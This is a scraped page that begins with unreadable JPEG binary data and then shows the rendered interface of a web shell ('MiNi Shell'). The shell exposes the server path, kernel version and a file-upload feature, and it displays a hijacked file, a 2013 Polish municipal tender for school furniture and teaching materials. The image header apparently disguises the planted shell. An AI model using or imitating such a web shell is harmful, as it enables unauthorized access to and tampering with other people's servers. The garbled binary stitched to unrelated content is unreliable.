JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131015/418270-N-2013.html

<p class="kh_header"><b>Gołuchów: Dostawa wyposażenia Szkoły Podstawowej w Kucharkach w ramach Projektu pn. Przebudowa starego budynku, przebudowa boisk i zagospodarowanie infrastruktury wokół Szkoły Podstawowej w Kucharkach</b><br>
<b>Numer ogłoszenia: 418270 - 2013; data zamieszczenia: 15.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gołuchów , ul. Lipowa 1, 63-322 Gołuchów, tel. 062 7617017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia Szkoły Podstawowej w Kucharkach w ramach Projektu pn. Przebudowa starego budynku, przebudowa boisk i zagospodarowanie infrastruktury wokół Szkoły Podstawowej w Kucharkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest: Dostawa wyposażenia Szkoły Podstawowej w Kucharkach w ramach Projektu pn. Przebudowa starego budynku, przebudowa boisk i zagospodarowanie infrastruktury wokół Szkoły Podstawowej w Kucharkach Lokalizacja zamówienia: gmina Gołuchów, miejscowość Kucharki Projekt współfinansowany jest przez Unię Europejską w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, Działanie 5.2 Rozwój infrastruktury edukacyjnej, w tym kształcenia ustawicznego - Schemat I Projekty z zakresu wsparcia infrastruktury edukacyjnej Przedmiot zamówienia składa się z następujących części: Część I Dostawa wyposażenia klas - opis w załączniku nr I informacja dotycząca ofert częściowych. Część II Dostawa edukacyjnych pomocy dydaktycznych - opis w załączniku nr I Informacja dotycząca ofert częściowych. Część III Dostawa nowoczesnego sprzętu, zestawów komputerowych, oprogramowania - opis w załączniku nr I Informacja dotycząca ofert częściowych. Dostawa wyposażenia i sprzętu określonego w części 1 - 3 musi być zrealizowana do Szkoły Podstawowej w Kucharkach, staraniem i na koszt Wykonawcy. Odbiór towarów, pierwsze uruchomienie dokonane zostanie w obecności przedstawiciela zamawiającego i poświadczone zostanie protokołem zdawczo-odbiorczym, który podpisany bez uwag będzie podstawą do wystawienia faktury. 2) Oznaczenie wg Wspólnego Słownika Zamówień: CPV 39.10.00.00-3; Meble CPV 39.11.20.00-0; Krzesła CPV 39.12.10.00-6; Biurka i stoły CPV 39.16.21.00-6; Materiały dydaktyczne CPV 39.16.21.10-9; Sprzęt dydaktyczny CPV 30.23.11.00-8; Komputery CPV 30.23.12.50-4; Monitory ekranowe CPV 30.23.32.31-9; Drukarki laserowe CPV 30.21.32.00-7; Laptopy CPV 30.23.20.00-4; Różny sprzęt komputerowy 3. Uwaga: - ilekroć w specyfikacji technicznej, wskazano markę lub pochodzenie produktu lub urządzenia, należy przyjąć że za każdą nazwą jest umieszczone słowo lub równoważne , tzn. że produkty, urządzenia itp. będą posiadały (charakteryzowały się) wszystkimi parametrami nie gorszymi niż opisane w w/w dokumentach. Wykonawca, który powołuje się na rozwiązania równoważne w stosunku do opisanych przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy i usługi spełniają wymagania określone przez Zamawiającego. 4. Okres gwarancji udzielonej przez Wykonawcę musi wynosić co najmniej 36 miesięcy. Ustala się okres rękojmi równy okresowi gwarancji. 5. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W przypadku, gdy Wykonawca nie dokona w/w wskazania Zamawiający uzna, iż cały zakres zamówienia określony w SIWZ Wykonawca będzie wykonywał osobiście bez pomocy podwykonawców. Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, musi załączyć do oferty wypełniony druk Informacja o podwykonawcach stanowiący załącznik nr 6 do niniejszej specyfikacji. Zlecenie przez Wykonawcę części zamówienia podwykonawcom nie zwalnia Wykonawcy od odpowiedzialności za wykonanie całości zamówienia. UWAGA ! Jeżeli Wykonawca powierzy wykonanie części zamówienia podwykonawcy, Zamawiający wymaga, aby Wykonawca dokonał na rzecz tego podwykonawcy przelewu (cesji) swojej wierzytelności w zakresie zapłaty przez Zamawiającego wynagrodzenia za zadanie wykonane przez podwykonawcę. Przedstawienie w/w umowy przelewu wierzytelności będzie warunkiem przystąpienia przez Zamawiającego do rozliczenia zadania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.16.21.00-6, 39.16.21.10-9, 30.23.11.00-8, 30.23.12.50-4, 30.23.32.31-9, 30.21.32.00-7, 30.23.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności wg załącznik nr 2 do SIWZ - pkt 1). Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia wg załącznik nr 2 do SIWZ - pkt 2). Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że dysponuje odpowiednim potęcjałem technicznym oraz osobami zdolnymi do wykonania zamówienia wg załącznik nr 2 do SIWZ - pkt 3). Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że dysponuje odpowiednim potęcjałem technicznym oraz osobami zdolnymi do wykonania zamówienia wg załącznik nr 2 do SIWZ - pkt 3). Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia wg załącznik nr 2 do SIWZ - pkt 4). Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy, zgodny w treści z wzorem stanowiącym załącznik nr 1 do SIWZ. 2) Informacje o podwykonawcach załącznik nr 6 do SIWZ. W przypadku braku podwykonawców wpisać nie dotyczy 3) pełnomocnictwo dla osób podpisujących ofertę, jeżeli upoważnienie takie nie wynika wprost z dokumentów rejestracyjnych firmy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.goluchow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gołuchów, ul. Lipowa 1, 63-322 Gołuchów ( pok. 23 ) lub za zaliczeniem pocztowym (koszty przesłania).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 12:00, miejsce: Urząd Gminy Gołuchów, ul. Lipowa 1, 63-322 Gołuchów Pokój nr 16 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, Działanie 5.2 Rozwój infrastruktury edukacyjnej, w tym kształcenia ustawicznego - Schemat I Projekty z zakresu wsparcia infrastruktury edukacyjnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wyposażenia klas.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ławki uczniowskie - szt. 52
Ławki uczniowskie w wersji 2 - osobowej, blat z płyty laminowanej na stelażu metalowym
- 9 szt. dwuosobowe stoły w rozmiarze 1 - wysokość stołu 46 cm
- 17 szt. dwuosobowe stoły w rozmiarze 2 - wysokość stołu 53 cm
- 13 szt. dwuosobowe stoły w rozmiarze 3 - wysokość stołu 59 cm
- 9 szt. dwuosobowe stoły w rozmiarze 4 - wysokość stołu 64 cm
- 4 szt. dwuosobowe stoły w rozmiarze 5 - wysokość stołu 71 cm
Blaty stołów w kolorze buku wykonane z wysokiej jakości laminatu HPL odporne na zarysowania i uderzenia, wykończone obrzeżem drewnianym odpornym na zarysowania i uderzenia.  
Każdy stolik ma zamocowaną metalową półkę pod blatem oraz haczyki na plecak. 
Stelaż metalowy wykonany z profilu płaskoowalnego w kolorze zgodnie z rozmiarem stołu. Stoliki posiadają masywne podwójne nogi zakończone podstawami wyposażone w zatyczki chroniące podłogę przed zarysowaniem.
2. Krzesła uczniowskie - szt. 104
Krzesła uczniowskie - stelaż metalowy, siedziska i oparcia z wyprofilowanej sklejki
- 18 szt. w rozmiarze 1 - wysokość siedziska 26 cm
- 34 szt. w rozmiarze 2 - wysokość siedziska 31 cm
- 26 szt. w rozmiarze 3 - wysokość siedziska 35 cm
- 18 szt. w rozmiarze 4 - wysokość siedziska 38 cm
- 8 szt. w rozmiarze 5 - wysokość siedziska 43 cm
Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki w tonacji  buku
Oparcie szerokie i delikatnie wygięte zwiększające komfort siedzenia. Siedzisko wyprofilowane. Krzesło pod siedziskiem ma ochronne zatyczki, aby zabezpieczyć blat przed zarysowaniem. 
Stelaż metalowy wykonany z profilu płaskoowalnego  w kolorze zgodnie z rozmiarem krzesła. Na górze stelaż zakończony ochronną zatyczką. 
Podstawa krzesła w kształcie litery H zapewnia stabilność, zakończona zatyczkami chroniącymi podłogę przed zarysowaniami.  
3. Segmenty meblowe do klas - szt. 5
Meble wykonane z płyty wiórowej w jasnych tonacjach z kolorowymi drzwiczkami. 
Segment  meblowy zestaw nr 1
Zestaw szafek dziecięcych o długości 550 +/- 20 cm zawierający:
- 3 komody po 8 szuflad i  każda o wymiarach 104 x 45 x  wysokość od 100 do130cm
- szafka dwudrzwiowa z 2 szufladami o  wymiarach 104 x 45 x wysokość od 100 do130 cm
- szafka narożna o wymiarach  65 x 65 x wysokość od 100 do130cm 
- regał z 3 półkami o wymiarach  69 x 45 x wysokość od 100 do130cm 
Segment  meblowy zestaw nr 2
Zestaw szafek dziecięcych o długości 548 +/- 20 cm zawierający:
- 3 komody po 8 szuflad  każda o wymiarach 104 x 45 x wysokość od 100 do130 cm
- szafka dwudrzwiowa z 2 półkami o  wymiarach 104 x 45 x wysokość od 100 do130 cm
- regał z pólkami i przegrodą na środku o wymiarach  132 x 65 x wysokość od 100 do130 cm
Segment  meblowy zestaw nr 3
Zestaw szafek dziecięcych o długości 482 +/- 20 cm zawierający: 
- 1 regał narożny z 2 półkami o wymiarach 80 x 80 x wysokość od 100 do130 cm
- 1 szafka dwudrzwiowa o wymiarach 104 x 45 x wysokość od 100 do130cm cm
- 2 komody po 8 szuflad każda o wymiarach 104 x 45 x wysokość od 100 do130 cm
- 1 regał z 3 półkami o wymiarach 90 x 45 x wysokość od 100 do130 cm
Segment  meblowy zestaw nr 4
Zestaw szafek dziecięcych o długości 437 +/- 20 cm ( ustawiany na dwóch przyległych ścianach)zawierający:
- 1 regał narożny wewnętrzny z 2 półkami o wymiarach 80 x 80 x wysokość od 100 do130 cm
- 1 regał z 3 szufladami i 2 półkami o wymiarach 104 x 45 x wysokość od 100 do130cm 
- 1 regał narożny zewnętrzny o wymiarach 45 x 45 x wysokość od 100 do130cm 
- 1 komoda z 6 szufladami o wymiarach 104 x 45 x wysokość od 100 do130cm
- 1 komoda z 8 szufladami  o wymiarach 104 x 45 x wysokość od 100 do130 cm
Segment  meblowy zestaw nr 5
Zestaw szafek dziecięcych o długości 416 +/- 20 cm zawierający:
- 2 komody z 8 szufladami każda o wymiarach 104 x 45 x wysokość od 100 do130 cm
- 1 regał z 3 półkami o wymiarach 104 x 45 x wysokość od 100 do130cm
- 1 szafka dwudrzwiowa z 3 półkami o wymiarach 104 x 45 x wysokość od 100 do130cm 
Meble wykonane w całości z płyty laminowanej w tonacji buku i frontami w kolorze jasnoniebieskim, jasnozielonym, żółtym i czerwonym ( jasne, pastelowe kolory)
Uchwyty do szuflad, drzwiczek schowane są w płycie i muszą być bezpieczne dla dzieci 
Wszystkie szafki muszą posiadać bezpieczne dla dzieci wykończenia w postaci zaokrąglonych narożników, odpornym na uderzenia i zarysowania. 
Boki i tylna ścianka wszystkich szafek wystają ponad wierzch.  
4. Biurka dla n-la  - szt. 5
Biurka dla nauczyciela z płyt laminowanych
Wykonane z płyty laminowanej w tonacji buku. Szafka i szuflada znajduje się po prawej stronie. Blat biurka oraz drzwiczki do szafki i szuflada wykonane w kolorze (żółtym 2 szt., jasnozielonym 2 szt., jasnoniebieskim 1 szt.). Blat biurka wykończone zaokrąglonym obrzeżem odpornym na uderzenia i zarysowania. 
5. Tablica tryptyk - szt. 3
Tablica składająca się z trzech części,  w tym jedna poliniowana, druga pokratkowana, trzecia gładka o wymiarach w rozwinięciu minimum 340 x 100 cm, kredowa, zielona, wyposażona w rynnę na kredę i z zaokrąglonymi brzegami
6. Tablica biała  - szt. 3
Suchościeralne tablice o wymiarach minimum 170 x 100 cm, biała
7. Tablice korkowe  - szt. 5
Tablice korkowe służące do prezentacji prac uczniów i materiałów dydaktycznych o wymiarach minimum 170 x 100 cm
8. Sztalugi dwustronne - szt. 12
Sztalugi wykorzystane do tworzenia prac plastycznych, wymiar sztalug minimum 60 x 130 cm
9. Ekran na statywie - szt. 3
Ekran ręcznie rozwijany na trójnogu:
- 2 ekrany o wymiarach co najmniej 120 x 165 cm,
- 1 ekran o wymiarach co najmniej 145 x 195 cm
10. Rzutnik pisma przenośny - szt. 2
Rzutnik pisma przenośny do prezentacji wizualnej materiałów dydaktycznych przygotowanych na folii, zamykany w walizeczce
11. Stolik pod rzutnik przenośny - szt. 2
Stolik pod rzutnik przenośny, blat z płyty laminowanej na stelażu metalowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa edukacyjnych pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowy materiał dydaktyczny pozwalający nauczycielowi w edukacji wczesnoszkolnej ułatwić każdemu dziecku naukę pisania, czytania, opowiadania, słuchania. 
Materiał  dydaktyczny powinien zawierać co najmniej różnorodne karty do analizy i syntezy wzrokowej, tablice z ćwiczeniami do nauki czytania,  nagrania bajek wraz z zestawem układanek do bajek, różnorodne logiczne układanki, karty umożliwiające  rozwój narządów artykulacyjnych, karty rozwijające  spostrzegawczość. - kpl. 1
2. Pakiet specjalistycznej pomocy multimedialnej z zakresu eliminowania trudności dzieci w czytaniu i pisaniu. Powinien składać się z co najmniej dwóch części oraz być atrakcyjną i ciekawą formą nauki. Programy powinny ułatwiać nauczycielowi diagnostykę, przeprowadzenie terapii, prowadzenie zajęć  korekcyjno-kompensacyjnych. Pakiet powinien być dostosowany dla uczniów klas I-III szkoły podstawowej.
Pakiet powinien zapewnić co najmniej karty do przeprowadzania ćwiczeń, ilustracje ułatwiające naukę, prowadzenie dokumentacji diagnostycznej i prób oraz opierać się na Skali Ryzyka Dyslekcji. 
Dotyczyć  wspomagania co najmniej nauki liter, badania dzieci, profilaktyki w dyslekcji, poprzez  różnorodne ćwiczenia, także ruchowe  itp.  Dzięki pakietowy nauczyciel powinien mieć ułatwioną ocenę przyczyn trudności dziecka i rozwiązywanie tych problemów. kpl. 1
3. Gra edukacyjna dla dzieci klas I-III szkoły podstawowej, kształcąca umiejętność czytania i pisania. Poprzez zabawę dziecko powinno zostać wprowadzone co najmniej w świat liter, czytania i pisania. Program powinien zawierać min. różnego typu ćwiczenia interaktywne, ilustracje, animacje, które ułatwiają dzieciom naukę płynnego czytania oraz poprawnego pisania.  szt. 18
4. Drewniane plansze z różnorodnymi labiryntami z przesuwanymi kształtami do zawieszenia na ścianę do ćwiczeń rozwijających sprawność manualną  dłoni i koordynacji wzrokowo - ruchowej, rozwijających  spostrzegawczość i wyobraźnię o wymiarach min. 0,5 x 1,5 x 0,5 m szt. 10
